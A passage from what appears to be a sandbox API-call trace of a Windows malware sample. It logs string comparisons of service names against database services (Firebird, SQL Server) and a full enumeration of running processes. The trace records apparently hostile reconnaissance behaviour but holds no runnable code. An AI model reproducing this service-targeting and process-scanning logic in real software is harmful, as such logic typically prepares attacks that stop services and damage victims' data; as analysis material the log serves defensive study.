lpString2="SENS") returned -1 [0210.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0210.460] lstrlenW (lpString="ShellHWDetection") returned 16 [0210.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0210.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0210.460] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0210.460] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0210.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0210.460] lstrlenW (lpString="Spooler") returned 7 [0210.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0210.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0210.460] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0210.460] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0210.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0210.460] lstrlenW (lpString="sppsvc") returned 6 [0210.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0210.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0210.460] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0210.460] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0210.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0210.460] lstrlenW (lpString="SSDPSRV") returned 7 [0210.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0210.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0210.460] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0210.460] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0210.461] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x43c [0210.474] Process32FirstW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.475] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.475] lstrlenW (lpString="System") returned 6 [0210.476] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.476] lstrlenW (lpString="smss.exe") returned 8 [0210.476] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.477] lstrlenW (lpString="csrss.exe") returned 9 [0210.477] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.478] lstrlenW (lpString="wininit.exe") returned 11 [0210.478] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.481] lstrlenW (lpString="csrss.exe") returned 9 [0210.481] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.482] lstrlenW (lpString="winlogon.exe") returned 12 [0210.482] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.483] lstrlenW (lpString="services.exe") returned 12 [0210.483] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.484] lstrlenW (lpString="lsass.exe") returned 9 [0210.484] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.485] lstrlenW (lpString="svchost.exe") returned 11 [0210.485] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0210.485] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0210.486] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0210.486] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0210.486] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.487] lstrlenW (lpString="svchost.exe") returned 11 [0210.487] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.491] lstrlenW (lpString="dwm.exe") returned 7 [0210.491] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.492] lstrlenW (lpString="svchost.exe") returned 11 [0210.492] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.492] lstrlenW (lpString="svchost.exe") returned 11 [0210.492] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.493] lstrlenW (lpString="svchost.exe") returned 11 [0210.493] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.494] lstrlenW (lpString="svchost.exe") returned 11 [0210.494] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.495] lstrlenW (lpString="svchost.exe") returned 11 [0210.495] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.496] lstrlenW (lpString="svchost.exe") returned 11 [0210.496] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.497] lstrlenW (lpString="svchost.exe") returned 11 [0210.497] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.497] lstrlenW (lpString="svchost.exe") returned 11 [0210.497] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.499] lstrlenW (lpString="svchost.exe") returned 11 [0210.499] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.499] lstrlenW (lpString="spoolsv.exe") returned 11 [0210.499] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.500] lstrlenW (lpString="svchost.exe") returned 11 [0210.500] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.501] lstrlenW (lpString="svchost.exe") returned 11 [0210.501] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0210.501] lstrlenW (lpString="audiodg.exe") returned 11 [0210.502] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0210.502] lstrlenW (lpString="sihost.exe") returned 10 [0210.502] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.503] lstrlenW (lpString="svchost.exe") returned 11 [0210.503] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0210.505] lstrlenW (lpString="taskhostw.exe") returned 13 [0210.506] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0210.506] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0210.506] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0210.507] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0210.507] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.508] lstrlenW (lpString="explorer.exe") returned 12 [0210.508] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0210.508] lstrlenW (lpString="Memory Compression") returned 18 [0210.508] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0210.509] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0210.509] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0210.511] lstrlenW (lpString="SearchUI.exe") returned 12 [0210.511] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0210.511] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0210.511] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.512] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0210.512] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0210.513] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0210.513] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0210.513] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0210.514] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0210.514] lstrlenW (lpString="conhost.exe") returned 11 [0210.514] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0210.515] lstrlenW (lpString="roof competitive.exe") returned 20 [0210.515] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0210.516] lstrlenW (lpString="trustees.exe") returned 12 [0210.516] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0210.516] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0210.517] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0210.517] lstrlenW (lpString="isbn.exe") returned 8 [0210.517] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0210.518] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0210.518] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0210.519] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0210.519] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0210.519] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0210.520] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0210.520] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0210.520] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0210.521] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0210.521] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0210.522] lstrlenW (lpString="playstation iraq.exe") returned 20 [0210.522] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0210.522] lstrlenW (lpString="harbor.exe") returned 10 [0210.523] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0210.523] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0210.523] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0210.524] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0210.524] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0210.525] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0210.525] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0210.526] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0210.526] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0210.527] lstrlenW (lpString="larent.exe") returned 10 [0210.527] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0210.528] lstrlenW (lpString="stereo.exe") returned 10 [0210.528] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0210.528] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0210.529] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0210.529] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0210.529] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0210.530] lstrlenW (lpString="state.exe") returned 9 [0210.530] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0210.531] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0210.531] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.532] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0210.532] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0210.533] lstrlenW (lpString="taskhostw.exe") returned 13 [0210.533] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0210.533] lstrlenW (lpString="sppsvc.exe") returned 10 [0210.534] Process32NextW (in: hSnapshot=0x43c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, 